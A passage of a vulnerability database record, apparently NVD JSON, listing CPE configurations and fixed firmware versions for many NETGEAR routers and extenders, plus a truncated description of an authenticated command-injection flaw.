"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0ABDCFC2-E9EC-40F4-862F-B86FDD0A6AC7",
"versionEndExcluding": "1.0.0.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0D989DB4-5276-4BCF-A15E-BC207E03B2C7",
"versionEndExcluding": "1.0.0.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex2700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A7D6C145-E2CD-4030-8AA8-C4071C0E242B",
"versionEndExcluding": "1.0.1.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex2700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5341B659-DE7D-43F1-954D-82049CBE18AD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F476F7D7-EAE2-4A09-8C4B-A53F885A1337",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "49846803-C6FB-4DD3-ADA7-78B9923536F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EFE54D2-78A3-4461-BA5E-6807911C5684",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "88DD070C-7CBD-48A5-8D77-7C3D1C502D65",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCBD76F6-4E46-42E1-A6B6-373F2F7DB4AF",
"versionEndExcluding": "1.0.1.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "B4F62287-CB55-4FB1-AA39-62018654BA39",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "85392ECB-985F-43B2-89BE-755E433FC14B",
"versionEndExcluding": "1.0.1.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1289BBB4-1955-46A4-B5FE-BF11153C24F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0D1F6E4-A21F-4B86-B903-C26BB062D0DD",
"versionEndExcluding": "1.0.1.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F285D60D-A5DA-4467-8F79-15EF8135D007",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BBA04A7E-6029-498B-970E-0317BE0CF0F2",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC9E7939-E195-44AB-8880-D0BCF26BF2E0",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jwnr2010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "34429B2B-D8CB-4BEC-B5FA-5C7F8AC9A1FE",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jwnr2010:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "7399E5E9-40D8-4ECD-8B7B-C96A27E10282",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDFB6345-0D0D-4586-9899-2438AADDCD3F",
"versionEndExcluding": "1.0.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "76B12C31-83C3-427F-B2CA-D75EA89DCC6F",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F5E7A8CA-134F-49B4-95D6-79A88CD6BB80",
"versionEndExcluding": "1.0.4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "97DE1C91-59A0-4902-B5C7-0CFD2631CAEE",
"versionEndExcluding": "1.0.1.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DBDE97EB-05FE-475E-8A4E-13C97E91548A",
"versionEndExcluding": "1.0.2.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "442F153C-737B-44D4-9A6D-EB6F6C47B986",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81F70E0C-3674-4981-B815-0721F6C6E588",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03DC2062-58D1-40D6-8536-A13C87F2CF11",
"versionEndExcluding": "1.0.9.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "326BBECA-9A76-4A3E-90F7-023797D5D186",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09963BE1-D57D-491A-9BD8-A1A46ED993E0",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FB08FA1-A476-4E05-9904-9BE30C9E77B7",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B75230D7-5B50-47C2-B5C5-C60C6974C305",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7494430D-BA3F-4EDB-9FB8-7586D4457B9D",
"versionEndExcluding": "1.0.0.118",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C38F66ED-C53D-40F4-9F1E-96254BCD8A0C",
"versionEndExcluding": "1.0.3.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A2E62164-2324-4AF2-B300-8005DAD433B6",
"versionEndExcluding": "1.0.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE1150D-8464-4421-94BD-EE81977BAC34",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "532B87A3-CE33-4F0F-A0A7-C7D7D568C593",
"versionEndExcluding": "1.0.4.4_1.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "606460FB-B46F-4490-96FC-B226F3A2C55D",
"versionEndExcluding": "1.1.5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B508ABA6-F17C-43D4-88D8-56ECD0057C65",
"versionEndExcluding": "1.1.5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63DDFEFE-402D-4AA8-A2C9-2217A5643DC1",
"versionEndExcluding": "1.0.2.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D7A3E675-BB4F-4E8B-A041-C208F85B5C0E",
"versionEndExcluding": "1.0.2.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "679AAEA7-6415-4BBA-AE95-887C2CA609DC",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2000rpt_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "785692C5-AA6D-43E9-B9E8-160352AC816D",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2000rpt:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "6FB1BE0D-E3CF-4C16-8C11-706B238E9934",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "030AAA8B-65D9-42E4-ACF6-F2DB13D4AA30",
"versionEndExcluding": "1.0.2.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "AB71AC74-2D1B-4F1E-A70F-6590A00AAD9E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3100rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8AB52FC6-BC09-41ED-BB91-63A4E795E0F8",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3100rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4D8680F5-0C06-4CFC-8BA0-CF85D0438419",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72DCD4C0-A757-4F98-97BD-FB1FEBF3235C",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "026C640E-7594-4B5A-BDF9-FAB1CD135A47",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5025770E-D9D0-4FB6-BE29-1F48EDC31AF1",
"versionEndExcluding": "1.0.2.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1413C591-D066-4FA2-BEB1-6C60F8645F28",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1425F7B0-0990-43F4-9621-8DAE8508FEED",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81A6B7D4-1CBB-4D9E-8EB2-E5E82AFA59FA",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E5684DEA-5F12-4E72-B8D1-C5F3E1D22726",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "27B33A47-E305-43CC-9AC2-C35DE8E51F02",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "36CCD48D-4474-4363-8DE6-846714B99D3D",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "436026D2-0B8E-4BA5-AD34-9EB285EDA78A",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9877579C-D214-4605-93AA-2B78914CF33C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB542F95-5AE2-47E4-BD7B-34134B26AA4F",
"versionEndExcluding": "1.2.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6150v2 before 1.0.1.54, EX6100v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.18, R6900P before 1.3.0.8, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R8000 before 1.0.4.4_1.1.42, R7900P before 1.1.5.14, R8000P before 1.1.5.14, R8300 before 1.0.2.110, 